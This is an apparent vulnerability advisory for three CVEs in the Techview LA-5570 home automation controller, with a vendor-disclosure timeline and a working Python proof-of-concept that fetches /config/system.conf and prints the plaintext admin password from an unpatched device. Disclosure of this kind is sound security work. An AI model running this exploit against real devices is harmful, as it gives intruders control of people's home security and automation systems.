CVE-2023-34723, CVE-2023-34724, CVE-2023-34725

Multiple Vulnerabilities found in Techview LA-5570 Wireless Gateway Home Automation Controller

Introduction

The Security Team at [exploitsecurity.io] uncovered multiple vulnerabilities in the Techview LA-5570 Wireless Home Automation Controller [Firmware Version 1.0.19_T53]. These vulnerabilities can be used to to gain full control of the affected device.

CVE-2023-34723

Vulnerability Type: Directory Indexing, allows a threat actor to list the contents of specific directories outside of the web root context.

CVE-2023-34724

Vulnerability Type: On-Chip Debug and Test Interface With Improper Access Control, allows a threat actor unrestricted access to the root filesystem using an exposed UART interface, without the need for authentication.

CVE-2023-34725

Vulnerability Type: Incorrect Access Control, allows a threat actor access to sensitive systems configuration files without proper authentication or authorisation.

Affected Product Overview

The Techview LA-5570 Wireless Home Automation Controller provides a fully wireless solution that enables a home user to secure, monitor and control home facilities locally or remotely via phone, tablet PC, laptop, keypad and keyfob.

Product: LA-5570 Wireless Home Automation Controller

Affected Firmware Version: 1.0.19_T53

Product Vendor Link: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570

CVE-2023-34723

The Security Team at [exploitsecurity.io] discovered that the Techview LA-5570 was susceptible to directory indexing.

This attack allows a threat actor to list the contents of specific directories outside the web root context {/server/cgi-bin/]. Most specifically it was possible to list the contents of the /config/ and /var/tmp/ directories which were found to contain sensitive system files. It was discovered that both of these directories were configured as symbolic links within the web root context [/server/cgi-bin/], whose corresponding directory paths, owned by the root user, were accessible to the web user.

CVE-2023-34724

The Security Team found that it was possible to gain unrestricted access to the root filesystem using an exposed UART interface, without the need for authentication.

CVE-2023-34725

The Security Team found that it was possible to access sensitive files based on improper access control. It was found that it was possible to gain access to the sensitive /config/system.conf configuration file without proper authorisation, which contained the plaintext WebUI login credentials.

Responsible Disclosure

The Security Team at [exploitsecurity.io], reached out to the vendor to ensure that a patch was released prior to public disclosure. However, as of the time of this disclosure, no patch has been applied.

Proof of Concept

The proof of concept code capitalises on CVE-2023-34725 to extract the WebUI password from the affected device, without proper authentication or authorisation.

#!/opt/homebrew/bin/python3

import requests
import sys
from time import sleep
from urllib3.exceptions import InsecureRequestWarning
from colorama import init
from colorama import Fore, Back, Style
import re
import os
import ipaddress
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

def banner():
    if os.name == 'posix':
        clr_cmd = ('clear')
    elif os.name == 'nt':
        clr_cmd = ('cls')
    os.system(clr_cmd)
    print ("[+]****************************************************[+]")
    print (" | Author      : The Security Team                      |")
    print (" | Company     : "+Fore.RED+ "Exploit Security" +Style.RESET_ALL+"\t\t\t|")
    print (" | Description : TechVIEW LA-5570 Directory Traversal   |")
    print (" | Usage       : "+sys.argv[0]+" <target>              |")   
    print ("[+]****************************************************[+]")

def usage():
    print (f"Usage: {sys.argv[0]} <target>")

def main(target):
    domain = "http://"+target+"/config/system.conf"
    try:
        url = domain.strip()
        r = requests.get(url, verify=False, timeout=3)
        print ("[+] Retrieving credentials", flush=True, end='')
        sleep(1)
        print(" .", flush=True, end='')
        sleep(1)
        print(" .", flush=True, end='')
        sleep(1)
        print(" .", flush=True, end='')
        if ("system_password" in r.text):
            data =  (r.text.split("\n"))
            print (f"\n{data[1]}")
        else:
            print (Fore.RED + "[!] Target is not vulnerable !"+ Style.RESET_ALL)
    except TimeoutError:
        print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)
    except KeyboardInterrupt:
        return
    except requests.exceptions.Timeout:
        print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)
        return
        
if __name__ == '__main__':
    if len(sys.argv)>1:
        banner()
        target = sys.argv[1]
        try:
            validate = ipaddress.ip_address(target)
            if (validate):
                main (target)
        except ValueError as e:
            print (Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL) 
    else:
        print (Fore.RED + f"[+] Not enough arguments, please specify target !" + Style.RESET_ALL)

Timeline

1. 26/5 - Raised a support ticket

2. 29/5 - Response from support requesting further information

3. 29/5 - Responded to support detailing that findings had been made, 29/5 - CVE request for placeholder from MITRE

4. 30/5 - Followup email requesting update

5. 1/6 - Followup email requesting update

6. 2/6 - Response from support requesting findings overview

7. 2/6 - Responded to support with findings overview

8. 2/6 - Support escalated to advanced product team

9. 23/6 - Placeholder(s) CVE assigned by Mitre

10. 25/8 - Public disclosure